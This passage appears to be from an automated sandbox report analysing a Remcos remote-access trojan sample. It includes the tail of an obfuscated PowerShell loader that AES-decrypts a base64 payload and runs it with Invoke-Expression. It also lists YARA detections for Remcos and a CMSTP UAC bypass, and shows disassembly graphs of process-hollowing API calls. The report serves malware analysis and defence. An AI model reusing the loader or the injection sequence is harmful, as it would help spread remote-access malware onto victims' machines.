'+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                              Imagebase:0xc80000
                              File size:427'008 bytes
                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:10:15:12
                              Start date:29/07/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x1140000
                              File size:64'704 bytes
                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.5%
                                Total number of Nodes:38
                                Total number of Limit Nodes:3
                                execution_graph 12327 2a7d08 12328 2a7d2f 12327->12328 12332 2a9669 12328->12332 12341 2aa0e0 12328->12341 12329 2a7e3a 12333 2a96ab 12332->12333 12334 2aa169 12333->12334 12335 2a8e48 WriteProcessMemory 12333->12335 12350 2a91e0 12333->12350 12354 2a8b00 12333->12354 12358 2a8af8 12333->12358 12362 2a8a08 12333->12362 12366 2a8a10 12333->12366 12334->12329 12335->12333 12343 2a9783 12341->12343 12342 2aa169 12342->12329 12343->12342 12344 2a8af8 Wow64SetThreadContext 12343->12344 12345 2a8b00 Wow64SetThreadContext 12343->12345 12346 2a8e48 WriteProcessMemory 12343->12346 12347 2a8a08 ResumeThread 12343->12347 12348 2a8a10 ResumeThread 12343->12348 12349 2a91e0 CreateProcessA 12343->12349 12344->12343 12345->12343 12346->12343 12347->12343 12348->12343 12349->12343 12351 2a9267 12350->12351 12351->12351 12352 2a9452 CreateProcessA 12351->12352 12353 2a94c5 12352->12353 12355 2a8b49 Wow64SetThreadContext 12354->12355 12357 2a8bc7 12355->12357 12357->12333 12359 2a8b01 Wow64SetThreadContext 12358->12359 12361 2a8bc7 12359->12361 12361->12333 12363 2a8a54 ResumeThread 12362->12363 12365 2a8aa6 12363->12365 12365->12333 12367 2a8a54 ResumeThread 12366->12367 12369 2a8aa6 12367->12369 12369->12333 12370 2a7ee0 12371 2a7e2e 12370->12371 12372 2a7e9e 12371->12372 12374 2a9669 6 API calls 12371->12374 12375 2aa0e0 6 API calls 12371->12375 12373 2a7e3a 12374->12373 12375->12373

                                Executed Functions

                                Function 002A9669 Relevance: 1.9, Strings: 1, Instructions: 658COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 685 2a9669-2a96a9 686 2a96ab 685->686 687 2a96b0-2a9782 685->687 686->687 688 2a9783-2a9866 call 2a91e0 687->688 694 2a9868-2a9884 688->694 695 2a988f-2a98b8 688->695 694->695 698 2a98ba 695->698 699 2a98bf-2a9904 695->699 698->699 703 2a990b-2a9937 699->703 704 2a9906 699->704 706 2a9939-2a9974 703->706 707 2a99a1-2a99db 703->707 704->703 710 2a999d-2a999f 706->710 711 2a9976-2a9992 706->711 712 2a99dd-2a99f9 707->712 713 2a9a04-2a9a0e 707->713 710->713 711->710 712->713 714 2a9a10 713->714 715 2a9a15-2a9a2d 713->715 714->715 717 2a9a2f 715->717 718 2a9a34-2a9a70 715->718 717->718 723 2a9a99-2a9a9f 718->723 724 2a9a72-2a9a8e 718->724 725 2a9ad1-2a9ad3 723->725 726 2a9aa1-2a9acf 723->726 724->723 727 2a9ad9-2a9aed 725->727 726->727 730 2a9aef-2a9b0b 727->730 731 2a9b16-2a9b20 727->731 730->731 732 2a9b22 731->732 733 2a9b27-2a9b4b 731->733 732->733 737 2a9b4d 733->737 738 2a9b52-2a9bb5 733->738 737->738 742 2a9bde-2a9c1f call 2a8e48 738->742 743 2a9bb7-2a9bd3 738->743 746 2a9c48-2a9c52 742->746 747 2a9c21-2a9c3d 742->747 743->742 748 2a9c59-2a9c66 746->748 749 2a9c54 746->749 747->746 752 2a9c68 748->752 753 2a9c6d-2a9c8b 748->753 749->748 752->753 756 2a9c8d 753->756 757 2a9c92-2a9c9e 753->757 756->757 758 2a9e5e-2a9e7a 757->758 759 2a9ca3-2a9cae 758->759 760 2a9e80-2a9ea4 758->760 761 2a9cb0 759->761 762 2a9cb5-2a9cdc 759->762 764 2a9eab-2a9ee9 call 2a8e48 760->764 765 2a9ea6 760->765 761->762 767 2a9cde 762->767 768 2a9ce3-2a9d0a 762->768 770 2a9eeb-2a9f07 764->770 771 2a9f12-2a9f1c 764->771 765->764 767->768 773 2a9d0c 768->773 774 2a9d11-2a9d48 768->774 770->771 775 2a9f1e 771->775 776 2a9f23-2a9f50 771->776 773->774 781 2a9d4e-2a9d5c 774->781 782 2a9e2f-2a9e39 774->782 775->776 783 2a9f5a-2a9f63 776->783 784 2a9f52-2a9f59 776->784 785 2a9d5e 781->785 786 2a9d63-2a9d6a 781->786 789 2a9e3b 782->789 790 2a9e40-2a9e51 782->790 787 2a9f6a-2a9f7a 783->787 788 2a9f65 783->788 784->783 785->786 793 2a9d6c 786->793 794 2a9d71-2a9db9 786->794 795 2a9f7c 787->795 796 2a9f81-2a9fb2 787->796 788->787 789->790 791 2a9e58 790->791 792 2a9e53 790->792 791->758 792->791 793->794 802 2a9dbb 794->802 803 2a9dc0-2a9de3 call 2a8e48 794->803 795->796 799 2aa01c-2aa056 796->799 800 2a9fb4-2a9fca 796->800 808 2aa058-2aa074 799->808 809 2aa07f-2aa08e 799->809 834 2a9fcd call 2a8af8 800->834 835 2a9fcd call 2a8b00 800->835 802->803 810 2a9de5-2a9e05 803->810 804 2a9fcf-2a9fef 806 2aa018-2aa01a 804->806 807 2a9ff1-2aa00d 804->807 806->809 807->806 808->809 831 2aa091 call 2a8a08 809->831 832 2aa091 call 2a8a10 809->832 812 2a9e2e 810->812 813 2a9e07-2a9e23 810->813 812->782 813->812 815 2aa093-2aa0b3 816 2aa0dc-2aa144 815->816 817 2aa0b5-2aa0d1 815->817 822 2aa14b-2aa163 816->822 823 2aa146 816->823 817->816 822->688 825 2aa169-2aa171 822->825 823->822 831->815 832->815 834->804 835->804
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8%
                                • API String ID: 0-1691505143
                                • Opcode ID: 5124060e568a33fab2080fb066a570b049bc94faddbd6ae0f41cbff8ef1b4cf4
                                • Instruction ID: f0a7d9f14c801b1fdfdc24b161a478baa18f8f156870aed7b5eed58c4eedb28f
                                • Opcode Fuzzy Hash: 5124060e568a33fab2080fb066a570b049bc94faddbd6ae0f41cbff8ef1b4cf4
                                • Instruction Fuzzy Hash: C9620475E002298FDB68DF69C894BDDBBB2BF89301F5480EA9409A7255DB305EC6CF50
                                Function 00354988 Relevance: 18.0, Strings: 14, Instructions: 539COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$$p$$p$$p$$p$$p$$p
                                • API String ID: 0-1321977132
                                • Opcode ID: e040b336a8f75b22e9585916600cf8c3b4e15a214b63b9efda031762507c8028
                                • Instruction ID: d30413ed9ff5fb132d8814d27344a397cb10fb2a32c1547ef89bcf1f9fd847cf
                                • Opcode Fuzzy Hash: e040b336a8f75b22e9585916600cf8c3b4e15a214b63b9efda031762507c8028
                                • Instruction Fuzzy Hash: CF02F231B04201DFCB2E8F68C455EAABBE5AFC4316F25C06ADC558B261DB71CD89CB91
                                Function 00353A08 Relevance: 10.5, Strings: 8, Instructions: 455COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 171 353a08-353a2b 172 353a31-353a36 171->172 173 353be9-353c35 171->173 174 353a4e-353a52 172->174 175 353a38-353a3e 172->175 183 353dc1-353e0b 173->183 184 353c3b-353c40 173->184 176 353b90-353b9a 174->176 177 353a58-353a5a 174->177 179 353a40 175->179 180 353a42-353a4c 175->180 185 353b9c-353ba5 176->185 186 353ba8-353bae 176->186 181 353a5c-353a68 177->181 182 353a6a 177->182 179->174 180->174 188 353a6c-353a6e 181->188 182->188 200 353e11-353e16 183->200 201 353f62-353fa6 183->201 189 353c42-353c48 184->189 190 353c58-353c5c 184->190 191 353bb4-353bc0 186->191 192 353bb0-353bb2 186->192 188->176 194 353a74-353a78 188->194 195 353c4c-353c56 189->195 196 353c4a 189->196 198 353d71-353d7b 190->198 199 353c62-353c64 190->199 197 353bc2-353be6 191->197 192->197 202 353a98 194->202 203 353a7a-353a96 194->203 195->190 196->190 204 353d7d-353d86 198->204 205 353d89-353d8f 198->205 207 353c74 199->207 208 353c66-353c72 199->208 211 353e2e-353e32 200->211 212 353e18-353e1e 200->212 258 353fb4-353fcc 201->258 259 353fa8-353faa 201->259 216 353a9a-353a9c 202->216 203->216 213 353d95-353da1 205->213 214 353d91-353d93 205->214 209 353c76-353c78 207->209 208->209 209->198 217 353c7e-353c9d 209->217 223 353f0f-353f19 211->223 224 353e38-353e3a 211->224 219 353e20 212->219 220 353e22-353e2c 212->220 222 353da3-353dbe 213->222 214->222 216->176 225 353aa2-353aa6 216->225 256 353cad 217->256 257 353c9f-353cab 217->257 219->211 220->211 229 353f27-353f2d 223->229 230 353f1b-353f24 223->230 232 353e3c-353e48 224->232 233 353e4a 224->233 226 353ab9 225->226 227 353aa8-353ab7 225->227 239 353abb-353abd 226->239 227->239 240 353f33-353f3f 229->240 241 353f2f-353f31 229->241 234 353e4c-353e4e 232->234 233->234 234->223 243 353e54-353e58 234->243 239->176 244 353ac3-353ac5 239->244 245 353f41-353f5f 240->245 241->245 246 353e78 243->246 247 353e5a-353e76 243->247 251 353ac7-353acd 244->251 252 353adf-353af9 244->252 260 353e7a-353e7c 246->260 247->260 254 353ad1-353add 251->254 255 353acf 251->255 269 353b08-353b1e 252->269 270 353afb-353afe 252->270 254->252 255->252 263 353caf-353cb1 256->263 257->263 274 353fd0-353fd2 258->274 275 353fce 258->275 259->258 260->223 264 353e82-353e85 260->264 263->198 267 353cb7-353cd6 263->267 273 353e8f-353e95 264->273 288 353cee-353d0d 267->288 289 353cd8-353cde 267->289 279 353b36-353b8d 269->279 280 353b20-353b26 269->280 270->269 281 353e9b-353e9d 273->281 278 353fdc-353fdd 274->278 275->278 282 353b28 280->282 283 353b2a-353b2c 280->283 286 353eb5-353f0c 281->286 287 353e9f-353ea5 281->287 282->279 283->279 290 353ea7 287->290 291 353ea9-353eab 287->291 297 353d14-353d62 288->297 298 353d0f-353d12 288->298 293 353ce0 289->293 294 353ce2-353ce4 289->294 290->286 291->286 293->288 294->288 299 353d67-353d6e 297->299 298->299
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$h%g$h%g
                                • API String ID: 0-2787474186
                                • Opcode ID: 816ab4900ed64cb0735be32f45314356038657958e1cb2597774a3397ca582bf
                                • Instruction ID: d88df3167f8d914034af5b03fa200da34fd2692fb18f71a5aaca3bda887b885c
                                • Opcode Fuzzy Hash: 816ab4900ed64cb0735be32f45314356038657958e1cb2597774a3397ca582bf
                                • Instruction Fuzzy Hash: C1E13731B043009FCB169B78D850BAEBBF5AFC5352F2584AADC45CB261DA71CE49C7A1
                                Function 003552B4 Relevance: 7.6, Strings: 5, Instructions: 1321COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 306 3552b4-3552b7 307 3552bd-3552c5 306->307 308 3552b9-3552bb 306->308 309 3552c7-3552cd 307->309 310 3552dd-3552e1 307->310 308->307 320 3552d1-3552db 309->320 321 3552cf 309->321 311 3552e7-3552eb 310->311 312 35540c-355416 310->312 313 3552ed-3552fe 311->313 314 35532b 311->314 315 355424-35542a 312->315 316 355418-355421 312->316 328 355464-3554b3 313->328 329 355304-355309 313->329 322 35532d-35532f 314->322 318 355430-35543c 315->318 319 35542c-35542e 315->319 324 35543e-355461 318->324 319->324 320->310 321->310 322->312 325 355335-355339 322->325 325->312 327 35533f-355343 325->327 327->312 331 355349-35536f 327->331 338 3556b6-3556c3 328->338 339 3554b9-3554be 328->339 332 355321-355329 329->332 333 35530b-355311 329->333 331->312 351 355375-355379 331->351 332->322 336 355315-35531f 333->336 337 355313 333->337 336->332 337->332 342 3554d6-3554da 339->342 343 3554c0-3554c6 339->343 348 3554e0-3554e2 342->348 349 35565f-355669 342->349 345 3554c8 343->345 346 3554ca-3554d4 343->346 345->342 346->342 352 3554e4-3554f0 348->352 353 3554f2 348->353 354 355675-35567b 349->354 355 35566b-355672 349->355 357 35539c 351->357 358 35537b-355384 351->358 359 3554f4-3554f6 352->359 353->359 360 355681-35568d 354->360 361 35567d-35567f 354->361 365 35539f-3553ac 357->365 362 355386-355389 358->362 363 35538b-355398 358->363 359->349 364 3554fc-35551b 359->364 366 35568f-3556b3 360->366 361->366 368 35539a 362->368 363->368 376 35551d-355529 364->376 377 35552b 364->377 369 3553b2-355409 365->369 368->365 378 35552d-35552f 376->378 377->378 378->349 379 355535-355539 378->379 379->349 380 35553f-355543 379->380 381 355545-355554 380->381 382 355556 380->382 383 355558-35555a 381->383 382->383 383->349 384 355560-355564 383->384 384->349 385 35556a-355589 384->385 388 3555a1-3555ac 385->388 389 35558b-355591 385->389 392 3555ae-3555b1 388->392 393 3555bb-3555d7 388->393 390 355595-355597 389->390 391 355593 389->391 390->388 391->388 392->393 394 3555f4-3555fe 393->394 395 3555d9-3555ec 393->395 396 355600 394->396 397 355602-355650 394->397 395->394 398 355655-35565c 396->398 397->398
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (op$(op$L4p$L4p$L4p
                                • API String ID: 0-2509652690
                                • Opcode ID: 73d748ff25e0a7ab64b352c15a549d0e0a80447da2c590dfb006d5c8b468b91e
                                • Instruction ID: 59f6c127acb13972f6a9aafe0be52dfc021376223f6dae3c3fc642c7cad71d0b
                                • Opcode Fuzzy Hash: 73d748ff25e0a7ab64b352c15a549d0e0a80447da2c590dfb006d5c8b468b91e
                                • Instruction Fuzzy Hash: 41B13C35700645DFCB168F28C860FAEBBB2AF85312F658469DD468B2B1DB70EC49CB51
                                Function 002A91E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 405 2a91e0-2a9279 407 2a927b-2a9292 405->407 408 2a92c2-2a92ea 405->408 407->408 413 2a9294-2a9299 407->413 411 2a92ec-2a9300 408->411 412 2a9330-2a9386 408->412 411->412 420 2a9302-2a9307 411->420 422 2a9388-2a939c 412->422 423 2a93cc-2a94c3 CreateProcessA 412->423 414 2a929b-2a92a5 413->414 415 2a92bc-2a92bf 413->415 417 2a92a9-2a92b8 414->417 418 2a92a7 414->418 415->408 417->417 421 2a92ba 417->421 418->417 424 2a932a-2a932d 420->424 425 2a9309-2a9313 420->425 421->415 422->423 431 2a939e-2a93a3 422->431 441 2a94cc-2a95b1 423->441 442 2a94c5-2a94cb 423->442 424->412 426 2a9317-2a9326 425->426 427 2a9315 425->427 426->426 430 2a9328 426->430 427->426 430->424 432 2a93c6-2a93c9 431->432 433 2a93a5-2a93af 431->433 432->423 435 2a93b3-2a93c2 433->435 436 2a93b1 433->436 435->435 437 2a93c4 435->437 436->435 437->432 454 2a95b3-2a95b7 441->454 455 2a95c1-2a95c5 441->455 442->441 454->455 456 2a95b9 454->456 457 2a95c7-2a95cb 455->457 458 2a95d5-2a95d9 455->458 456->455 457->458 459 2a95cd 457->459 460 2a95db-2a95df 458->460 461 2a95e9-2a95ed 458->461 459->458 460->461 462 2a95e1 460->462 463 2a95ef-2a9618 461->463 464 2a9623-2a962e 461->464 462->461 463->464 468 2a962f 464->468 468->468
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002A94A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373266998.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2a0000_powershell.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: 8%$8%$8%
                                • API String ID: 963392458-3701733527
                                • Opcode ID: 4cf972cf361807221305b4830bd137721b5e33f02932e2071fe09dbde2264769
                                • Instruction ID: 257095c99ee16f0dc40f4829dbe17de894637e93d1c9971e79ada4350ee9455c
                                • Opcode Fuzzy Hash: 4cf972cf361807221305b4830bd137721b5e33f02932e2071fe09dbde2264769
                                • Instruction Fuzzy Hash: 9BC12770D1021A8FDF25CFA9C841BEEBBB1BF49300F0095A9D859B7290DB749A95CF94
                                Function 003543E8 Relevance: 6.6, Strings: 5, Instructions: 367COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 469 3543e8-35440b 470 3545e6-354612 469->470 471 354411-354416 469->471 479 354614-354619 470->479 480 35465f-354699 470->480 472 35442e-354432 471->472 473 354418-35441e 471->473 477 354593-35459d 472->477 478 354438-35443c 472->478 475 354420 473->475 476 354422-35442c 473->476 475->472 476->472 481 35459f-3545a8 477->481 482 3545ab-3545b1 477->482 483 35444f 478->483 484 35443e-35444d 478->484 485 354631-354649 479->485 486 35461b-354621 479->486 496 3546b8 480->496 497 35469b-3546b6 480->497 488 3545b7-3545c3 482->488 489 3545b3-3545b5 482->489 490 354451-354453 483->490 484->490 500 354657-35465c 485->500 501 35464b-35464d 485->501 493 354625-35462f 486->493 494 354623 486->494 495 3545c5-3545e3 488->495 489->495 490->477 491 354459-354479 490->491 516 354498 491->516 517 35447b-354496 491->517 493->485 494->485 504 3546ba-3546bc 496->504 497->504 501->500 507 3546c2-3546c6 504->507 508 35474a-354754 504->508 507->508 511 3546cc-3546e9 507->511 512 354756-35475d 508->512 513 354760-354766 508->513 522 3546ef-3546f1 511->522 523 354799-35479e 511->523 514 35476c-354778 513->514 515 354768-35476a 513->515 520 35477a-354796 514->520 515->520 521 35449a-35449c 516->521 517->521 521->477 526 3544a2-3544a4 521->526 527 3546f3-3546f9 522->527 528 35470b-354720 522->528 523->522 530 3544b4 526->530 531 3544a6-3544b2 526->531 532 3546fd-354709 527->532 533 3546fb 527->533 541 354726-354744 528->541 542 3547a3-3547d4 528->542 536 3544b6-3544b8 530->536 531->536 532->528 533->528 536->477 537 3544be-3544de 536->537 550 3544f6-3544fa 537->550 551 3544e0-3544e6 537->551 541->508 546 3547e4 542->546 547 3547d6-3547e2 542->547 549 3547e6-3547e8 546->549 547->549 552 35480a-354814 549->552 553 3547ea-3547ee 549->553 556 354514-354518 550->556 557 3544fc-354502 550->557 554 3544e8 551->554 555 3544ea-3544ec 551->555 559 354816-35481b 552->559 560 35481e-354824 552->560 553->552 558 3547f0-354807 553->558 554->550 555->550 563 35451f-354521 556->563 561 354504 557->561 562 354506-354512 557->562 564 354826-354828 560->564 565 35482a-354836 560->565 561->556 562->556 566 354523-354529 563->566 567 354539-354590 563->567 569 354838-354852 564->569 565->569 571 35452d-35452f 566->571 572 35452b 566->572 571->567 572->567
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$$p$$p$$p
                                • API String ID: 0-2334450948
                                • Opcode ID: 70ea95d3ec16305f2e683d461b05513a04620169fb4251abb54b186fc9ab91bf
                                • Instruction ID: 0333528aea1bc9c76374ff72f9d44defcc7dc84ae5fb79d366ca6d43349c47e5
                                • Opcode Fuzzy Hash: 70ea95d3ec16305f2e683d461b05513a04620169fb4251abb54b186fc9ab91bf
                                • Instruction Fuzzy Hash: 47C149357043409FCB1A9B79D410F6ABBE29FC6316F25846BDC45CB2A1EA71CC8AC761
                                Function 003543C8 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 577 3543c8-35440b 578 3545e6-354612 577->578 579 354411-354416 577->579 587 354614-354619 578->587 588 35465f-354699 578->588 580 35442e-354432 579->580 581 354418-35441e 579->581 585 354593-35459d 580->585 586 354438-35443c 580->586 583 354420 581->583 584 354422-35442c 581->584 583->580 584->580 589 35459f-3545a8 585->589 590 3545ab-3545b1 585->590 591 35444f 586->591 592 35443e-35444d 586->592 593 354631-354649 587->593 594 35461b-354621 587->594 604 3546b8 588->604 605 35469b-3546b6 588->605 596 3545b7-3545c3 590->596 597 3545b3-3545b5 590->597 598 354451-354453 591->598 592->598 608 354657-35465c 593->608 609 35464b-35464d 593->609 601 354625-35462f 594->601 602 354623 594->602 603 3545c5-3545e3 596->603 597->603 598->585 599 354459-354479 598->599 624 354498 599->624 625 35447b-354496 599->625 601->593 602->593 612 3546ba-3546bc 604->612 605->612 609->608 615 3546c2-3546c6 612->615 616 35474a-354754 612->616 615->616 619 3546cc-3546e9 615->619 620 354756-35475d 616->620 621 354760-354766 616->621 630 3546ef-3546f1 619->630 631 354799-35479e 619->631 622 35476c-354778 621->622 623 354768-35476a 621->623 628 35477a-354796 622->628 623->628 629 35449a-35449c 624->629 625->629 629->585 634 3544a2-3544a4 629->634 635 3546f3-3546f9 630->635 636 35470b-354720 630->636 631->630 638 3544b4 634->638 639 3544a6-3544b2 634->639 640 3546fd-354709 635->640 641 3546fb 635->641 649 354726-354744 636->649 650 3547a3-3547d4 636->650 644 3544b6-3544b8 638->644 639->644 640->636 641->636 644->585 645 3544be-3544de 644->645 658 3544f6-3544fa 645->658 659 3544e0-3544e6 645->659 649->616 654 3547e4 650->654 655 3547d6-3547e2 650->655 657 3547e6-3547e8 654->657 655->657 660 35480a-354814 657->660 661 3547ea-3547ee 657->661 664 354514-354518 658->664 665 3544fc-354502 658->665 662 3544e8 659->662 663 3544ea-3544ec 659->663 667 354816-35481b 660->667 668 35481e-354824 660->668 661->660 666 3547f0-354807 661->666 662->658 663->658 671 35451f-354521 664->671 669 354504 665->669 670 354506-354512 665->670 672 354826-354828 668->672 673 35482a-354836 668->673 669->664 670->664 674 354523-354529 671->674 675 354539-354590 671->675 677 354838-354852 672->677 673->677 679 35452d-35452f 674->679 680 